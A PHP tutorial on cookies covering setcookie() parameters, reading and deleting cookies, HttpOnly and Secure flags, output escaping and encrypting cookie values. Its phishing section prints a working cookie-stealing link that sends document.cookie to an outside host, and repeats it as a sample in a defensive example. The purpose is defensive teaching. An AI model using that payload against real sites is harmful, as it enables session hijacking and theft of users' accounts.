PHP Cookies

The How-to and Why with Examples

Most people know very little about Internet cookies. They are small pieces of text-based data held on the web user’s computer which allow web pages to save bits of data about the user’s visit or account. They are necessary because they allow user data to persist, which makes longer and more intelligent web-based interactions possible. PHP’s setcookie() function takes the following parameters:
  1. Name – The name of the cookie.
  2. Value – The value of the cookie.
  3. Expiration – The expiration date and time of the cookie, as a Unix timestamp.
  4. Path – The URL path on the site for which the browser will send the cookie. Using ‘/’ designates all paths.
  5. Domain – The domain the cookie is limited to, if any.
  6. Secure – Flag designating that the cookie should be sent by the user’s browser over a secure (HTTPS) connection only.
  7. HTTPOnly – Flag designating that PHP should send the httponly attribute. If set, that cookie cannot be read by JavaScript through document.cookie, which limits what a script injected into the page can steal.
A cookie can only be created for the domain that sends the response. If no expiration date is given when the cookie is created, the cookie becomes a session cookie and lives only for the life of the browser session; once the browser is shut down the cookie is destroyed. If an expiration date is set, the cookie becomes a persistent cookie and lives until that date and time is passed, at which point it is destroyed. Cookies can be read only on the domain on which they were created, the exception being the Adobe Flash cookie, which is a separate mechanism not governed by these rules.

PHP Cookie Methods and Persistence

Setting a cookie is quite easy in PHP. Because cookies travel in the HTTP response headers, setcookie() must be called before any output is sent:
$userid = "25E85*#k59SMK";
// set user cookie expiring in 24 hours (3600 seconds * 24)
setcookie("userid", $userid, time() + 3600 * 24);
‘Persistent’ cookies are cookies that live longer than the browser session. When the browser is shut down, the persistent cookie still resides on the machine until it reaches its expiration date. There are two ways of reading a cookie. The programmer can use the predefined PHP variable $HTTP_COOKIE_VARS (a legacy long form that was removed in PHP 5.4) or simply the shorter superglobal $_COOKIE. Either way the value comes from the browser and should be treated as untrusted input.
// read cookie using the $_COOKIE superglobal (preferred)
if (isset($_COOKIE["userid"]))
{
    $userid = $_COOKIE["userid"];
}
// read cookie using the legacy long form (PHP < 5.4 only)
if (isset($HTTP_COOKIE_VARS["userid"]))
{
    $userid = $HTTP_COOKIE_VARS["userid"];
}
To delete a cookie, the programmer simply sets the expiration date to a point in time that has already passed; the browser then discards the cookie. The deleting call must use the same name, path and domain as the call that created the cookie, otherwise the browser treats it as a different cookie and keeps the original.
// delete a cookie by expiring it 24 hours in the past
setcookie("userid", "", time() - 3600 * 24);
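The parameter list and the set/read/delete calls above, pulled together into one added example that is not part of the original article. It uses the options-array form of setcookie(), which exists from PHP 7.3 onward, so that the Secure, HttpOnly and SameSite attributes are set on every write and the deletion matches the original path and domain. The cookie name, value and time-to-live are constructed for the example.

```php
<?php
// Added example (not from the original article): set, read and delete a
// cookie with the flags from the parameter list. Assumes PHP >= 7.3 (options
// array) and that this runs before any output, since cookies are headers.

function cookie_options(int $expires): array
{
    return [
        'expires'  => $expires,   // 0 would make it a session cookie
        'path'     => '/',        // sent for all paths on the site
        'domain'   => '',         // current host only
        'secure'   => true,       // only over HTTPS
        'httponly' => true,       // hidden from document.cookie
        'samesite' => 'Lax',      // not attached to cross-site POSTs
    ];
}

function set_user_cookie(string $name, string $value, int $ttlSeconds): bool
{
    return setcookie($name, $value, cookie_options(time() + $ttlSeconds));
}

function read_user_cookie(string $name): ?string
{
    // $_COOKIE is whatever the browser sent: validate before trusting it.
    return isset($_COOKIE[$name]) ? (string) $_COOKIE[$name] : null;
}

function delete_user_cookie(string $name): bool
{
    // Same path/domain/flags as the creating call, with an expiry in the past.
    unset($_COOKIE[$name]);
    return setcookie($name, '', cookie_options(time() - 3600 * 24));
}

// Usage with a constructed value, e.g. right after a successful login:
set_user_cookie('userid', '25E85*#k59SMK', 3600 * 24);
$current = read_user_cookie('userid');   // null until the browser sends it back
delete_user_cookie('userid');
```

With Secure set, a browser on a plain http:// page will not store the cookie at all, so test this over HTTPS or on localhost, which browsers treat as secure.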

How To Print All Cookies or Delete All Cookies

Combining the methods above with a small amount of PHP code allows the webmaster to print out all existing cookies. The values come from the browser, so they are passed through htmlspecialchars() before being echoed into the page:
// print all cookies
$count = count($_COOKIE);
print("<pre>\n");
print("$count cookies found.\n");
foreach ($_COOKIE as $name => $value)
{
    $name  = htmlspecialchars($name);
    $value = htmlspecialchars($value);
    print "<font color=\"#0066ff\">$name</font> = <font color=\"#cc6633\">$value</font>\n";
}
print("</pre>\n");
// delete all cookies by expiring each one 24 hours in the past
foreach ($_COOKIE as $name => $value)
{
    setcookie($name, "", time() - 3600 * 24);
}
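An added example, not from the original article, of the same two tasks written as reusable functions. It handles the case the loop above does not: PHP turns cookie names such as `prefs[theme]` into nested arrays in $_COOKIE, and a plain string cast of an array only prints "Array". The style attributes and the path argument are assumptions for the example.

```php
<?php
// Added example (not from the original article): list and expire every
// cookie the browser sent. Values are client-controlled, so they are
// HTML-escaped; echoing them raw would be a reflected-XSS sink.

function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_cookie_table(array $cookies): string
{
    $html = "<pre>\n" . count($cookies) . " cookies found.\n";
    foreach ($cookies as $name => $value) {
        // Cookie names like prefs[theme] arrive as arrays; show them as JSON.
        $shown = is_array($value) ? json_encode($value) : (string) $value;
        $html .= '<span style="color:#0066ff">' . esc((string) $name) . '</span> = '
               . '<span style="color:#cc6633">' . esc($shown) . "</span>\n";
    }
    return $html . "</pre>\n";
}

function delete_all_cookies(array $cookies, string $path = '/'): int
{
    $deleted = 0;
    foreach ($cookies as $name => $value) {
        // The path (and domain, if any) must match the creating call,
        // otherwise the browser keeps the original cookie.
        if (setcookie((string) $name, '', time() - 3600 * 24, $path)) {
            $deleted++;
        }
    }
    return $deleted;
}

// Usage: must run before any output because deletion sends headers.
$n = delete_all_cookies($_COOKIE);
echo render_cookie_table($_COOKIE);
```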

How can a Web User’s Cookies and Session Variables Be Viewed By a Phishing Website

Cookies cannot be directly viewed by another website. There is, however, an exploit whereby a website can take a snapshot of a web user’s cookies by getting the user to perform a quick action without thinking. There are many places online where users are presented with a message containing a link to click on: online bulletin boards, messaging programs, emails, popup advertisements, and so on. When a user receives a message from a sender they do not recognize, and the message contains a clickable link, it could be, and probably is, an attempt to obtain personal information. Here is how it works. The user is presented with a communication containing a link such as:
<a href="#"
   onclick="window.location='http://www.wikiwebpedia.com/takeusercookies.cgi?text='+escape(document.cookie);
            return false;">We have been looking for you.
Click Here to claim your $500,000.00 inheritance!</a>
The presentation, message and theme will all be geared toward getting the user to click the link very fast. This will usually be stated as a one-time offer, expiring in x number of days, and so on. If the user clicks the link, the script above is executed: it reads the user’s cookie and session data from their browser, sends it to the attacker’s server, and then immediately redirects the user to a page that talks about the original offer. The theft happens so fast that it is completely unnoticeable. Note that document.cookie only exposes the cookies of the page on which the link is rendered, so the attack works when the message is displayed unescaped inside the site whose cookies are wanted, for example by a bulletin board that echoes posts as raw HTML; cookies set with the HTTPOnly flag described above are not visible to document.cookie at all. It is good practice never to click on a link from a company or user that is unknown.
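The two server-side defences against the link above, as an added example that is not from the original article: escape user-authored content before echoing it, so that the <a onclick> is displayed as text rather than rendered, and mark the session cookie HttpOnly so that document.cookie cannot see it even where escaping is missed. It assumes PHP 7.3 or later for the array form of session_set_cookie_params(), and the hostile message is the page’s own link embedded as a constructed sample.

```php
<?php
// Added example (not from the original article): two defences against the
// cookie-stealing link described in the text. Assumes PHP >= 7.3 and that
// harden_session_cookie() runs before any output (it sends headers).

function harden_session_cookie(): void
{
    session_set_cookie_params([
        'lifetime' => 0,       // session cookie: gone when the browser closes
        'path'     => '/',
        'domain'   => '',
        'secure'   => true,    // HTTPS only
        'httponly' => true,    // not readable via escape(document.cookie)
        'samesite' => 'Lax',
    ]);
    session_start();
}

// Render a bulletin-board post so that any markup in it is shown, not run.
function render_message(string $author, string $body): string
{
    $flags = ENT_QUOTES | ENT_HTML5;
    return '<div class="message"><b>' . htmlspecialchars($author, $flags, 'UTF-8')
         . '</b><p>' . nl2br(htmlspecialchars($body, $flags, 'UTF-8')) . '</p></div>';
}

// Constructed sample: the link from the text, submitted as a message body.
$hostile = "<a href=\"#\" onclick=\"window.location='http://www.wikiwebpedia.com/"
         . "takeusercookies.cgi?text='+escape(document.cookie); return false;\">"
         . "Click Here to claim your \$500,000.00 inheritance!</a>";

harden_session_cookie();
echo render_message('unknown sender', $hostile);
// The output contains "&lt;a href=&quot;#&quot; onclick=..." as visible text;
// the browser creates no anchor and no onclick handler.
```

The same escaping rule applies to every other place user input is written into HTML (usernames, signatures, search terms); htmlspecialchars() with ENT_QUOTES covers attribute contexts as well as element text.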

Cookie Benefits and Precautions

Cookies can reduce trips to the database and enrich the user experience by persisting user selections in a safe manner, as long as the webmaster keeps basic website security in mind. Any cookie which holds personal information should be encrypted with a key-based encryption algorithm for added security, and the server should verify that the cookie has not been modified before using what it decrypts. The cookie data is readable on the user’s machine and by the issuing site only; users visit many sites, however, and if a malicious website manages to run script in the issuing site’s pages while the cookies exist, they can be compromised. A faster and more intuitive website greatly adds to the overall user experience and may make the difference between a web user just passing through or becoming a customer and regular visitor.
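The encryption the paragraph calls for, as an added example that is not from the original article. It uses libsodium’s secretbox, which is bundled with PHP from 7.2 onward and is authenticated, so a cookie that has been altered on the client fails to open instead of decrypting to garbage. The key-loading function and the profile data are constructed for the example; in a real deployment the key would come from server-side configuration, not from a call in the script.

```php
<?php
// Added example (not from the original article): keep personal data in a
// cookie under authenticated encryption. Assumes PHP >= 7.3 (JSON_THROW_ON_ERROR)
// with the bundled sodium extension. Only the server ever holds the key.

function cookie_key(): string
{
    // Constructed for the example: a real app loads a 32-byte key from an
    // environment variable or key store, and rotates it.
    static $key = null;
    if ($key === null) {
        $key = sodium_crypto_secretbox_keygen();
    }
    return $key;
}

function seal_cookie_value(array $data, string $key): string
{
    $nonce  = random_bytes(SODIUM_CRYPTO_SECRETBOX_NONCEBYTES); // fresh per write
    $plain  = json_encode($data, JSON_THROW_ON_ERROR);
    $cipher = sodium_crypto_secretbox($plain, $nonce, $key);    // ciphertext + MAC
    // URL-safe base64 keeps the value legal inside a Set-Cookie header.
    return sodium_bin2base64($nonce . $cipher, SODIUM_BASE64_VARIANT_URLSAFE_NO_PADDING);
}

function open_cookie_value(string $raw, string $key): ?array
{
    try {
        $bin = sodium_base642bin($raw, SODIUM_BASE64_VARIANT_URLSAFE_NO_PADDING);
    } catch (SodiumException $e) {
        return null;                                   // not valid base64
    }
    $min = SODIUM_CRYPTO_SECRETBOX_NONCEBYTES + SODIUM_CRYPTO_SECRETBOX_MACBYTES;
    if (strlen($bin) < $min) {
        return null;                                   // too short to be ours
    }
    $nonce  = substr($bin, 0, SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);
    $cipher = substr($bin, SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);
    $plain  = sodium_crypto_secretbox_open($cipher, $nonce, $key);
    if ($plain === false) {
        return null;                                   // wrong key or tampered
    }
    $data = json_decode($plain, true);
    return is_array($data) ? $data : null;
}

// Round trip with constructed profile data.
$key    = cookie_key();
$sealed = seal_cookie_value(['userid' => 25, 'theme' => 'dark'], $key);
setcookie('profile', $sealed, [
    'expires' => time() + 86400, 'path' => '/',
    'secure' => true, 'httponly' => true, 'samesite' => 'Lax',
]);

$opened   = open_cookie_value($sealed, $key);          // ['userid' => 25, 'theme' => 'dark']
$tampered = $sealed;
$tampered[10] = ($tampered[10] === 'A') ? 'B' : 'A';   // flip one character
$rejected = open_cookie_value($tampered, $key);        // null: MAC check fails
```

Encrypting does not stop a user from replaying an old cookie of their own, so anything that must be current (a role, a balance) belongs in server-side session storage keyed by an opaque session id, with the cookie holding only that id.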